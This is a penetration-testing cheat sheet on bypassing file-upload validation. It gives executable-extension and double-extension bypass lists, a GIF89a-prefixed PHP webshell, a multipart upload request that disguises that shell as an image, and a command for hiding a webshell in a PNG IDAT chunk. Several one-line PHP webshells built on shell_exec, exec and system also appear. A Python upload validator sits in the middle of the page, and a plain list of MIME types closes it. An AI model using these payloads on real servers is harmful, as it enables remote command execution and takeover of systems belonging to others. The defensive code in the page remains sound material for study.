# File Upload Tricks

When uploading files, check for validation on:

1. **File extension**

   * Server side: which extensions are allowed?

   ```
   php
   phtml
   php4
   ```

   * Stacking / double extension

   ```
   .php.png
   .%20.php
   ```

Using a GIF header (shell.php)

```
GIF89a;
<?php
system($_GET['cmd']);
?>
```

Advanced GIF (the same trick inside a multipart upload, with the part headers set by hand):

```http
Content-Disposition: form-data; name="upload"; filename="web.php"
Content-Type: image/png

GIF89a;
<?php
system($_GET['cmd']);
?>
```

2. **Content-Type header**

* Can a server-side extension such as `.php` bypass the upload restriction?

  * If yes, just change the Content-Type header to an image type and the file will still run as PHP.

* Does the server validate the Content-Type header (e.g. disallow `application/json`)?

3. **Magic bytes (file hex value)**

* Does the server check the **file signature**?
* If not, the file signature can be changed with `hexedit`.
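A defender-side check that applies all three validations above (extension, Content-Type, magic bytes) to constructed uploads. This is an added example, not code from the original page; the sample PNG and the "GIF89a;" trick file are built inline, and the allowlist and rejection strings are my own choices.

```python
import zlib
from urllib.parse import unquote

# Allowlist per final extension: required Content-Type and magic bytes.
ALLOWED = {"png": ("image/png", b"\x89PNG\r\n\x1a\n"), "jpg": ("image/jpeg", b"\xff\xd8\xff"),
           "gif": ("image/gif", (b"GIF87a", b"GIF89a"))}
SCRIPT_EXT = {"php", "phtml", "php3", "php4", "php5", "phar"}

def extension_ok(filename):
    # Percent-decode, then check EVERY dotted part: rejects "shell.php.png" and "shell.%20.php".
    name = unquote(filename).lower()
    parts = name.split(".")[1:]
    if "\x00" in name or not parts or any(p.strip() in SCRIPT_EXT for p in parts):
        return False
    return parts[-1] in ALLOWED

def png_well_formed(data):
    # Walk the chunks, verify every CRC, and allow nothing after IEND.
    pos = 8
    while pos + 12 <= len(data):
        length = int.from_bytes(data[pos:pos + 4], "big")
        ctype, body = data[pos + 4:pos + 8], data[pos + 8:pos + 8 + length]
        crc = int.from_bytes(data[pos + 8 + length:pos + 12 + length], "big")
        if len(body) != length or zlib.crc32(ctype + body) != crc:
            return False
        pos += 12 + length
        if ctype == b"IEND":
            return pos == len(data)  # trailing bytes after IEND -> reject
    return False

def validate_upload(filename, content_type, data):
    # Returns "ok" or the first reason the upload is rejected.
    if not extension_ok(filename):
        return "bad extension"
    ext = unquote(filename).lower().rsplit(".", 1)[-1]
    if content_type != ALLOWED[ext][0]:
        return "content-type does not match extension"
    if not data.startswith(ALLOWED[ext][1]):
        return "magic bytes do not match extension"
    if ext == "png" and not png_well_formed(data):
        return "malformed png"
    if b"<?php" in data or b"<?=" in data:  # catches only the plain GIF89a trick
        return "script tag in body"
    return "ok"

# Constructed samples: a genuine 1x1 PNG, and the "GIF89a;" + PHP trick above.
def _chunk(ctype, body):
    return len(body).to_bytes(4, "big") + ctype + body + zlib.crc32(ctype + body).to_bytes(4, "big")
TINY_PNG = (ALLOWED["png"][1] + _chunk(b"IHDR", bytes([0, 0, 0, 1, 0, 0, 0, 1, 8, 2, 0, 0, 0]))
            + _chunk(b"IDAT", zlib.compress(bytes(4))) + _chunk(b"IEND", b""))
GIF_TRICK = b"GIF89a;\n<?php /* payload would go here */ ?>\n"
```

Even all three checks together are only a first line: a payload carried inside a valid IDAT chunk passes them, so re-encode images on the server and store uploads where the web server will not execute them.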

### PHP Function Exploit

If the server re-encodes uploads with image functions such as `imagecopyresampled` or `imagecreatefromstring`, a payload that is simply appended after the image header does not survive the re-encoding.


Solution: hide the webshell in the IDAT chunk of the PNG.

Tool: https://github.com/huntergregal/PNG-IDAT-Payload-Generator/tree/master

```bash
python3 generate.py -m php -o webshell.png
```

Rename to `webshell.png.php`

#### Shell exec

PHP functions that execute a shell command: `shell_exec()`, `exec()`, `system()`

Examples:

```php
<?php echo shell_exec($_GET['command']); ?>
<?php echo exec($_GET['command']); ?>
<?php echo system($_GET['command']); ?>
```

```php
<?php echo exec($_GET['e'].' 2>&1'); ?>
<?php system($_GET['e'].' 2>&1'); ?>
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
```

### Content-Types of Common Files

#### Pictures

```
image/png
image/jpeg
image/gif
```

#### JSON

```
application/json
```

#### PHP

```
application/x-php
application/x-www-form-urlencoded
multipart/form-data
application/octet-stream
```

#### TXT

```
text/plain
```

#### XML

```
application/xml
text/xml
```

#### HTML

```
text/html
```

#### JAVASCRIPT

```
text/javascript
application/javascript
```

#### PDF

```
application/pdf
```

#### AUDIO

```
audio/mpeg
audio/wav
```

#### VIDEO

```
video/mp4
video/quicktime
```
